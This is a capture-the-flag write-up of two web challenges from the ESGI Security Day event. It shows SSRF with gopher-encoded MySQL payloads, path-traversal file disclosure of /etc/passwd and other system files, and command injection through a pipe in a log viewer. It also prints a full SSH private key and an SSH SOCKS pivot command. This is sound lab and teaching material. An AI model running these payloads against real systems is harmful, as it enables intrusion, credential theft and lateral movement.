CTF
Name : ESGI Security Day 7th EditionWebsite : ctf.hacklab-esgi.org Type : Online/On-siteFormat : Jeopardy
100 - Rookie - Web
(▀̿Ĺ̯▀̿ ̿)
M0th3r >Hey bah quoi ? Tu t’attendais au grand M0th3r légendaire. Désolé de te décevoir. Il parait que tu veux servir la cause ? Tu m'as trouvé mais c'est pas encore gagné. C'est pas dit que j'te prenne sous mon aisselle.
Tiens, entraîne toi, et on verra peut être si t'as l'étoffe d'un Pirate Cybernétique.
ctf.hacklab-esgi.org:8082
There is an SSRF, let's dump source code of the challenge:
curl -v 'file:///proc/self/cwd/index.php'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 <?php include_once "config_test.php" ;?> <html> <head> <title>Super curling</title> <meta charset="utf-8" /> <style type="text/css" > body { text-align: center; background-color: font-family: "Gill Sans Extrabold" , sans-serif; } </style> </head> <body> <h1>Website checker</h1> <p>Nous utilisons une nouvelle technologie parfaitement sûre pour tester vos divers sites internet. N'hésitez pas à nous donner du Dodgecoin!</p> <form action="index.php" method="post"> URL Checker : <input type="text" name=' url' /> </form> <?php if (isset($_POST[' url'])&&!empty($_POST[' url'])) { $url = $_POST[' url']; $content_url = getUrlContent($url); } else { $content_url = ""; } ?> </body> </html>
curl -v 'file:///proc/self/cwd/config_test.php'
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php function getUrlContent ($url $url = escapeshellarg ($url ); $pl = "curl -v " .$url ; echo $pl ; $content = shell_exec ($pl ); echo $content ; return $content ; } ?>
escapeshellarg bypass with curl are not so interesting https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#curl
Let's try MySQL command execution through a gopher SSRF thanks to PHP wrappers:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 $ gopherus --exploit mysql ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$ For making it work username should not be password protected!!! Give MySQL username: tiix Give query to execute: \! id Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%06%00%00%00%03%5c%21%20%69%64%01%00%00%00%01 -----------Made-by-SpyD3r-----------
The gopher SSRF worked but it seems command execution won't be possible. It confirmed we have 5.5.5-10.1.37-MariaDB-0+deb9u1 and tiix user is working without password.
Let's take a look at the current DB:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 gopherus --exploit mysql ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$ For making it work username should not be password protected!!! Give MySQL username: tiix Give query to execute: SHOW DATABASES Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0f%00%00%00%03%53%48%4f%57%20%44%41%54%41%42%41%53%45%53%01%00%00%00%01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 gopherus --exploit mysql ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$ For making it work username should not be password protected!!! Give MySQL username: tiix Give query to execute: SHOW TABLES from securityday Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%00%00%00%03%53%48%4f%57%20%54%41%42%4c%45%53%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01 -----------Made-by-SpyD3r-----------
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 gopherus --exploit mysql ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$ For making it work username should not be password protected!!! Give MySQL username: tiix Give query to execute: SHOW COLUMNS FROM nothinghere FROM securityday Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2f%00%00%00%03%53%48%4f%57%20%43%4f%4c%55%4d%4e%53%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%20%46%52%4f%4d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01 -----------Made-by-SpyD3r-----------
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 $ gopherus --exploit mysql ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$ For making it work username should not be password protected!!! Give MySQL username: tiix Give query to execute: USE securityday; SELECT flag FROM nothinghere Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2e%00%00%00%03%55%53%45%20%73%65%63%75%72%69%74%79%64%61%79%3b%20%53%45%4c%45%43%54%20%66%6c%61%67%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%01%00%00%00%01 -----------Made-by-SpyD3r-----------
Flag was ESGI{W3lC0me_R00ki3_M0th3r_1s_0ld}.
(unsolved) 350 - My Name is Rookie - Web
(ง ͠° ͟ل͜ ͡°)ง
M0th3r > Quelque chose me perturbe. Comment un Androïde a pu passer le test des pirates cybernétique. Duke le premier de son genre n’a été crée par personne du gouvernement. Aujourd’hui disparu je veux retrouver son core. Si tu veux m’aider, tu dois passer le test des pirate Cybernétique. C’est le test que Duke-083 a passé haut la main. Récupère tout ce que tu sais sur Zedcorp.
http = ctf.hacklab-esgi.org:5008 ssh = ctf.hacklab-esgi.org:5007
Warning : I didn't managed to go to the last part of the challenge.
1 2 3 4 5 6 7 $ curl http://ctf.hacklab-esgi.org:5008/robots.txt User-agent: * Disallow: /assets Disallow: /js Disallow: /api Disallow: /logs Disallow: /images
In the file http://ctf.hacklab-esgi.org:5008/logs/access.log we can see a POST and GET requests to /0cc175b9c0f1b6a831c399e269772661/admin.php.
We also found http://ctf.hacklab-esgi.org:5008/login.php.
In access-details.log we get admin credentials: admin / pxrAW7a4HNMBw86bc.
On the admin dashboard there is a TODO list:
Todo
Finish log functionality.
Monitor login POST data from modsecurity log.
Create script to detect spam.
Implement contact functionality.
Create script to generate ssh key all 2 weeks.
We can also display 3 logs: access, error, and other vhosts access.
A typical request is:
1 $ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=error.log'
Trying a path traversal LFI we get the wanted file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../etc/passwd' ... nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin test:x:1001:1001:,,,:/home/test:/usr/sbin/nologin trobin:x:1004:1004:Thibaud Robin,8,0145674356,0145674356,Trainee full stack developer:/home/trobin:/bin/bash ...
We may use trobin for ssh access.
We have only the last 10 lines of the file disclosed, the log filename must be appended to a default tail but hopefully we can append options to tail.
However there is a filter, we can't send a semi-colon ; or a null byte %00.
Let's try to disclose source of the challenge:
1 $ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php -n 10000'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 <?php session_start (); if (!isset ($_SESSION ['logged' ])) { header ('Location: ../index.php' ); die (); } ?> <!DOCTYPE HTML> <html> <head> <title>My Personnal Website - Admin</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" /> <link rel="stylesheet" href="../assets/css/main.css" /> <noscript><link rel="stylesheet" href="../assets/css/noscript.css" /></noscript> </head> <body class ="is -preload "> <!-- Wrapper --> <div id ="wrapper "> <!-- Header --> <header id ="header "> <a href ="../index .html " class ="logo "><strong >My Personnal Website </strong ></a > <nav > <a href ="#menu ">Menu </a > </nav > </header > <!-- Menu --> <nav id ="menu "> <ul class ="links "> <li ><a href ="../index .html ">Home </a ></li > </ul > </nav > <!-- Main --> <div id ="main " class ="alt " style ="border -color :transparent ;"> <!-- One --> <section id ="one "> <div class ="inner "> <header class ="major "> <h1 >Admin panel </h1 > </header > <!-- Content --> <h4 >Todo </h4 > <ol > <li >Finish log functionality .</li > <ul style ="margin :0 0 0 0"> <li >Monitor login POST data from modsecurity log .</li > <li >Create script to detect spam .</li > </ul > <li >Implement contact functionality .</li > <li >Create script to generate ssh key all 2 weeks .</li > </ol > <hr > <h4 >Log </h4 > <form method ="post " action ="#"> <div class ="col -4 col -12-small "> <input type ="radio " name ="log " id ="access " value ="access .log " checked > <label for ="access ">Access </label > </div > <div class ="col -4 col -12-small "> <input type ="radio " name ="log " id ="error " value ="error .log "> <label for ="error ">Error </label > </div > <div class ="col -4 col -12-small "> <input type ="radio " name ="log " id ="vhost " value ="other_vhosts_access .log "> <label for ="vhost ">Other vhosts access </label > </div > <br > <input type ="submit " value ="Show " class ="secondary " /> </form > <?php if (isset ($_POST ['log ']) && !empty ($_POST ['log '])) { if (preg_match ("/[\"'-,;#]+/" , $_POST ['log' ])) { echo "<p><strong style='color:#e74c3c;'>Error : use of forbidden chars...</strong></p>" ; } else { $cmd = "tail -n 10 /var/log/apache2/" . $_POST ['log' ]; echo "<pre><code>" ; system ($cmd . " &" ); echo "</code></pre>" ; } } ?> </div> </section> </div> </div> <!-- Scripts --> <script src="../assets/js/jquery.min.js" ></script> <script src="../assets/js/jquery.scrolly.min.js" ></script> <script src="../assets/js/jquery.scrollex.min.js" ></script> <script src="../assets/js/browser.min.js" ></script> <script src="../assets/js/breakpoints.min.js" ></script> <script src="../assets/js/util.js" ></script> <script src="../assets/js/main.js" ></script> </body> </htm>
The filtering regex is the following: preg_match("/[\"'-,;#]+/", $_POST['log'].
I can also dump login.php:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 <?php session_start (); ?> <!DOCTYPE HTML> <html> <head> <title>Elements - Forty by HTML5 UP</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" /> <link rel="stylesheet" href="assets/css/main.css" /> <noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript> </head> <body class ="is -preload "> <!-- Wrapper --> <div id ="wrapper "> <!-- Header --> <header id ="header "> <a href ="index .php " class ="logo "><strong >My Personnal Website </strong ></a > <nav > <a href ="#menu ">Menu </a > </nav > </header > <!-- Menu --> <nav id ="menu "> <ul class ="links "> <li ><a href ="index .php ">Home </a ></li > </ul > </nav > <!-- Main --> <div id ="main " class ="alt " style ="border -color :transparent ;"> <!-- One --> <section id ="one "> <div class ="inner "> <header class ="major "> <h1 >Authentication </h1 > </header > <?php if (isset ($_POST ['username ']) && isset ($_POST ['password '])) { $username = htmlentities ($_POST ['username' ]); $password = htmlentities ($_POST ['password' ]); if ($username === "admin" && $password === "pxrAW7a4HNMBw86bc" ) { $_SESSION ['logged' ] = 1 ; header ('Location: 0cc175b9c0f1b6a831c399e269772661/admin.php' ); } else if (preg_match ("/[\"'-,#]+/" , "$username $password " )) { echo "<p><strong style='color:#e74c3c;'>Hey ! Do you try to hack me ?!</strong></p>" ; } else { echo "<p><strong style='color:#e74c3c;'>Error : incorrect credentials !</strong></p>" ; } } ?> <form method="post" action="login.php" > <div class ="row gtr -uniform "> <div class ="col -10"> <input type ="text " name ="username " value ="" placeholder ="Username " /> </div > <div class ="col -10"> <input type ="password " name ="password " value ="" placeholder ="Password " /> </div > <div class ="" lass ="col -12"> <input type ="submit " value ="Connection " class ="primary " /> </div > </div > </form > </div > </section > </div > </div > <!-- Scripts --> <script src ="assets /js /jquery .min .js "></script > <script src ="assets /js /jquery .scrolly .min .js "></script > <script src ="assets /js /jquery .scrollex .min .js "></script > <script src ="assets /js /browser .min .js "></script > <script src ="assets /js /breakpoints .min .js "></script > <script src ="assets /js /util .js "></script > <script src ="assets /js /main .js "></script > </body > </html >
Let's see /etc/hosts to find info on Zedcorp.
1 2 3 4 5 6 7 8 9 10 11 127.0.0.1 localhost 127.0.1.1 dev-server 10.0.0.1 dev-server dev-server.zedcorp 10.0.0.2 project-server project-server.zedcorp 10.0.0.3 admin-server admin-server.zedcorp # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
And reading proc/self/environ:
1 2 3 4 5 6 7 8 9 10 11 APACHE_RUN_DIR=/var/run/apache2 APACHE_PID_FILE=/var/run/apache2/apache2.pid JOURNAL_STREAM=8:11700 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin INVOCATION_ID=82b54f38b32a4bbb8c9fd813d21543f6 APACHE_LOCK_DIR=/var/lock/apache2 LANG=C APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data APACHE_LOG_DIR=/var/log/apache2 PWD=/var/www/html/0cc175b9c0f1b6a831c399e269772661
The apache configuration (/etc/apache2/apache2.conf) may help us:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 ... LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %O" common LogFormat "%{Referer}i -> %U" referer LogFormat "%{User-agent}i" agent # Include of directories ignores editors' and dpkg's backup files, # see README.Debian for details. # Include generic snippets of statements IncludeOptional conf-enabled/*.conf # Include the virtual host configurations: IncludeOptional sites-enabled/*.conf # Enable the module. SecRuleEngine On SecAuditEngine RelevantOnly # Setup logging in a dedicated file. SecAuditLog /var/log/apache2/access-details.log # Allow it to access requests body. SecRequestBodyAccess on SecAuditLogParts ABIFHZ # Setup default action. SecDefaultAction "nolog,noauditlog,allow,phase:2" # Define the rule that will log the content of POST requests. SecRule REQUEST_METHOD "POST" "id:800000,phase:2,t:none,pass,nolog,auditlog" # Can read the logs on /logs <Directory /var/www/html/logs> SecRuleEngine Off </Directory> # Authorize command injection on admin.php <Directory /var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php> SecRuleEngine Off </Directory>
We can also execute commands with a pipi |:
1 $ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://ctf.hacklab-esgi.org:5008/login.php' -H 'Connection: keep-alive' -H 'Cookie: _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=hffthjjq4jil8o5at2mklo4fc4' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -X POST --data 'log=../../../../../../../var/log/apache2/access.log -n 1 | cat /home/trobin/TODO.txt'
/home/trobin/TODO.txt
1 2 - Finish admin backend functionnality - Clean up the server
/home/trobin/script/get-ssh-connection
1 2 3 4 5 #!/bin/bash cat /var/log/auth.log | grep ssh | grep "session opened"
/home/test/.ssh/id_rsa
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA1f3hWbx2726sOiwm+gg8Td2261E7QSJhQHcQFEns7Ubonx6E +YU4BgzQt136gK42RwoGOph8H/Tu0zfjGIx9IQOIDG8VmCItfUDFCexoqoZB2cj2 9sLKgA/VZqRJiSka1+uibcyIgFnyDegbSXt42J6XL6xZaT56aq539s8M/aFSWNEf 8yTBG7k4E0ZWqexBhXDK3rNJ1veH3EcJXBjYgitDLXSS/VPE7op6MlD5q7ZdNt28 45idJ5tT+U8xrht71oGiIswxi1dXz0VvjXOIJIk1iQIyRdiGIvPpHIY+Dxw2FTHo pi7Z3M5hjoq36LQryHjVbUVaUrvkyeQtZXeDIQIDAQABAoIBAHloJrhAwsGo6rG+ ZwaoMX6D8cmkNpgHp2Fpq4e3QWKFPmk4aX0fZd+Y2bmO6hajwEuhllMcPB/tWKoh JQjCfCOE22UiiP/dNC3B14h/xgopTab/642oijcJxKsNPmNBHOev2mGtDyyy2y+k pgaUtMVBhMkZYUjil5V7ErjGU7p5CCqeZUditEMKq9eAAq8oNGq84L0ZKqx4dyPN Ai36I8Nygk1SpYBod+K7lUYDDfd+ZPR/yEVhfHP9JqLdezfpeJW7SQvgc4Fb0rEY +tvM0IfyIR/9tB7IrfNuXG6S+UjoP5eybasUMDn0sqSGYLfaq1pFZYolneDkrpeV 9mPBoAECgYEA+LJUBHTrdKWqxtwkugg05Iu5nEMTGhUmZ4b6x2MRGeadqPF6u9+R 0eubqX+oNWAKBgtHQSzE8faLnOJ6lc2oEN6jeukCDStYg//aIaEyZf2r/uBs0+zA QNO8CQ5dXK5sowaFPgqXZ0mIFUmtDOgSm6M3IRc4BK6nYlxClVzTs4ECgYEA3Eal GLMBNykaR0jCD1CartiTZay6ld1rCZVJWjONDgJGtzi0tW1j7Mr5jk0dwfp7cJVu /Dx+sc4Om/nJ3h15pvvcrKnv0kPhqXX4h+dFmz2psTKmjYjpsff0eLRJS9JHVNEb svu/zHqzzrRsm1un3Ikcvy0lnG31sg6kJ8EXH6ECgYEApe/Wv2KD+EDRwf4BQ19W a2gPYIQgqraR+WHG0mL3diC58Y+uJMz3rulV47KZuYNrLL05vfLxNcEbRoKW6H1g NmFXExuFkuPpG6oLEYVM62Bm8pksA/tkC907CY/cG4sGUYB4Rv0qKHCXrByMqp/u SoqMrjef2P/wD2EfzCkz2AECgYBIr98m6VrLUvri7vVqjFSewcTR1k+zyF7byLFt 3Hj9WG7xYvruq2w/5TK4bGYXbopxOj5naab9EVvsyF5+twc/vPiy2VjT76Z1fwJG BmEHuy9V07r2FWnYWlQHyKYvKPJ04JPdWgmOdicDXLJCCdq4gV5FD6bLmdVrrj0p CSSSQQKBgQCI3TUMYeR/4+86B6i2sldPVtn52QrOHeaDwRfZ1Z7TRYPY6gIvKBLd VVU6YcP0KwZUHeUOC7qNxSCTnB7FkANad+D/7a0MGqAGCmWChS5GD6zpqhW+tKkY zc9Ur+20TJHIwAKloaZLiMdcpdyFUQQRStXCGD6wqbw8UxGfx1Fd0g== -----END RSA PRIVATE KEY-----
1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ chmod 0600 id_rsa $ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa Linux dev-server 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 ____ _ ___ |_ /___ __| |/ __|___ _ _ _ __ / // -_) _` | (__/ _ \ '_| '_ \ /___\___\__,_|\___\___/_| | .__/ Dev Server |_| [HINT] : Do you know proxychains ? Last login: Sat Apr 6 04:20:26 2019 from 78.245.84.201 This account is currently not available. Connection to ctf.hacklab-esgi.org closed.
This is autoclosing because test user has no shell (more exactly /usr/sbin/nologin).
By reading /etc/hostname we know we are on the dev-server. So the flag must be on the project or admin server.
1 2 10.0.0.2 project-server project-server.zedcorp 10.0.0.3 admin-server admin-server.zedcorp
/etc/resolv.conf is configured to nameserver 192.168.122.1.
1 $ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa -fN -D 4321
-f : ssh in background
-N : do not execute a remote command
